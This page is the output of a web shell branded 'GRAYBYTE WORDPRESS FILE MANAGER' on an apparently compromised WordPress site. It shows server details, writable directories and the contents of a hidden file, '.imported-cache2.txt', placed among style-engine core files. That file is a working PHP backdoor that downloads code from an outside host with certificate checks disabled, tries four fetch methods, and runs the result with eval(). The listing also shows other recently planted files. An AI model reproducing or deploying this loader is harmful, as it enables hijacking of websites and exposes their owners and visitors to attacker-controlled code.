GRAYBYTE WORDPRESS FILE MANAGER7771

Server IP : 198.54.121.189 / Your IP : 216.73.216.67
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/giriqfky/trustyourlawyer.com/wp-includes/style-engine/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/giriqfky/trustyourlawyer.com/wp-includes/style-engine//.imported-cache2.txt
<?php
ob_start();

$remote_url = "https://graybyte.host/wordpress-raw/wordpress-shop.txt";
$timeout_seconds = 20;

function wp_fetch_curl($url, $timeout) {
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => $timeout,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_MAXREDIRS => 5,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_USERAGENT => 'WordPress/CodeFetcher/1.0',
    ]);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    return $response ?: false;
}

function wp_fetch_file_get_contents($url, $timeout) {
    $context = stream_context_create([
        'http' => [
            'timeout' => $timeout,
            'header' => "User-Agent: WordPress/CodeFetcher/1.0\r\n",
            'follow_location' => true,
            'max_redirects' => 5,
        ],
        'ssl' => [
            'verify_peer' => false,
            'verify_peer_name' => false,
        ],
    ]);
    
    return @file_get_contents($url, false, $context) ?: false;
}

function wp_fetch_remote_get($url, $timeout) {
    if (!function_exists('wp_remote_get')) {
        return false;
    }
    
    $response = wp_remote_get($url, [
        'timeout' => $timeout,
        'redirection' => 5,
        'sslverify' => false,
        'user-agent' => 'WordPress/CodeFetcher/1.0',
    ]);
    
    if (is_wp_error($response)) {
        return false;
    }
    
    return wp_remote_retrieve_body($response) ?: false;
}

function wp_fetch_guzzle($url, $timeout) {
    if (!class_exists('\GuzzleHttp\Client')) {
        return false;
    }
    
    try {
        $client = new \GuzzleHttp\Client([
            'timeout' => $timeout,
            'verify' => false,
            'headers' => [
                'User-Agent' => 'WordPress/CodeFetcher/1.0',
            ],
        ]);
        
        return $client->get($url)->getBody()->getContents() ?: false;
    } catch (\Exception $e) {
        return false;
    }
}

if (!filter_var($remote_url, FILTER_VALIDATE_URL)) {
    ob_end_clean();
    exit;
}

$wordpress = false;
$methods = [
    'wp_fetch_curl',
    'wp_fetch_file_get_contents',
    'wp_fetch_remote_get',
    'wp_fetch_guzzle',
];

foreach ($methods as $method) {
    $wordpress = $method($remote_url, $timeout_seconds);
    if ($wordpress !== false && trim($wordpress) !== '') {
        break;
    }
}

if ($wordpress === false || trim($wordpress) === '') {
    ob_end_clean();
    exit;
}

try {
    eval("?>$wordpress");
} catch (Throwable $e) {
    ob_end_clean();
    exit;
}

ob_end_flush();

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 10 2025 04:32:19
giriqfky / giriqfky
0755
wp-includes
--
July 10 2025 04:32:19
giriqfky / giriqfky
0755
.htaccess
0.41 KB
July 10 2025 04:32:19
giriqfky / giriqfky
0644
.import-cache.txt
2.566 KB
July 09 2025 23:11:07
giriqfky / giriqfky
0644
.imported-cache2.txt
2.565 KB
July 10 2025 00:03:34
giriqfky / giriqfky
0644
admin.php
4.984 KB
July 09 2025 23:10:05
giriqfky / giriqfky
0644
class-wp-style-engine-css-declarations.php
5.075 KB
May 17 2023 21:28:26
giriqfky / giriqfky
0644
class-wp-style-engine-css-rule.php
5.92 KB
May 03 2024 14:17:12
giriqfky / giriqfky
0644
class-wp-style-engine-css-rules-store.php
3.639 KB
May 03 2024 14:17:12
giriqfky / giriqfky
0644
class-wp-style-engine-processor.php
5.264 KB
May 03 2024 14:17:12
giriqfky / giriqfky
0644
class-wp-style-engine.php
27.094 KB
April 16 2025 14:34:12
giriqfky / giriqfky
0644
index.php
4.57 KB
July 09 2025 23:10:05
giriqfky / giriqfky
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF